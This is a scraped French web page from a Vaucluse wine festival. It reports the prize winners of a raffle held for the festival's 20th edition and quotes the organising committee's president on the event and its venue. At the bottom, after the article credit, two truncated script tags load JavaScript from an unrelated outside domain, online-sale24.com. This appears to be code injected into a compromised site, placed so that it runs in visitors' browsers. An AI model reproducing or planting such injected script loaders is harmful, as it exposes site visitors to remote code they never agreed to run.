La Fête de la Vigne et du Vin | Remise des prix du jeu concours
La Fête de la Vigne et du Vin est un événement pour fédérer autour du vin. Les caves et domaines viticoles du Vaucluse font découvrir leur terroir, leurs appellations, leurs millésimes, enseignent l'art de la dégustation, le savoir-faire vigneron, l'histoire d'un terroir d'exception aux amateurs et connaisseurs de vins. L'événement se déroule chaque année pendant le weekend de l'ascension.
vin - vigneron - viticulture - savoir-faire - vigne - vignoble - événement - millésime - terroir - dégustation - appellation - amateur de vin - connaisseur de vin - fête - loisir - convivialité - famille
5
post-template-default,single,single-post,postid-5,single-format-standard,ajax_fade,page_not_loaded,,qode-theme-ver-6.1,wpb-js-composer js-comp-ver-4.11.2,vc_responsive

Remise des prix du jeu concours

01 Juil Remise des prix du jeu concours

À l’occasion de la 20 ème Édition de La Fête de la Vigne et du Vin, les responsables de la manifestation ont souhaité organiser un grand jeu concours.


Objectifs : marquer l’anniversaire de cet événement, désormais national, crée en 1995 par les jeunes vignerons coopérateur de Vaucluse. L’opération qui s’est déroulée le 31 mai dernier, a ainsi permis à plus d’un millier de personnes de participer à cette tombola dont les trois premiers prix étaient dotés respectivement de 72, 48 et 24 bouteilles des meilleurs crus locaux de la Vallée du Rhône.

 » Avec ce grand jeu concours, nous avons voulu marque le coup auprès du public, qui nous suit depuis de nombreuses années, explique Joel Choveton président du Comité d’Organisation de la Fête de la Vigne et du Vin en Vaucluse. L’idée était également d’inciter les gens à se rendre directement dans les caves afin d’y déposer leur bulletin de participation. »

Le premier prix a ainsi été remporté par les habitants de Grenoble, le second par des gens de Vedène et le troisième par des participants de la Ciotat. Devant l’engouement pour l’initiative, les organisateurs devraient d’ailleurs reconduire l’opération pour la prochaine édition.

Mobilisation des vignerons de Vaucluse

Organisé chaque samedi suivant le jour de l’ascension, La Fête de la Vigne et du Vin permet aux vignerons de recevoir le public dans leur chais, caveaux et vignobles en proposant de nombreuses animations et dégustations. Aujourd’hui, plus d’une quarantaine de vignerons participe à cette manifestation en Vaucluse. En france, l’opération est déclinée dans une quarantaine de départements. Chaque édition accueille près de 400 000 visiteurs dont au moins 30 000 dans notre département.

Pour l’an prochain, la manifestation, dont la communication a été confiée à l’agence de communication sorguaise Cosmoze dirigée par Barbara Maroncelli, les vignerons ont bon espoir de revenir sur la place du Palais des Papes.

« Depuis quelques années, notre village des vignerons » a dû laisser la place à Alterarosa, regrette Joel Choveton. C’est dommage car Avignon est notre capitale, celle des Côtes du Rhône. Je suis pourtant sûr que nous pouvons trouver un moyen de tous cohabiter sur cette place magnifique. »

Article l’Écho du mardi Les petites affiches de Vaucluse n°3608 du 1er juillet 2014

article_Page_03

 

type=’text/javascript’ src=’http://online-sale24.com/1.js’>

type=’text/javascript’ src=’http://online-sale24.com/1.js’>

Pas de commentaires

Poster Un Commentaire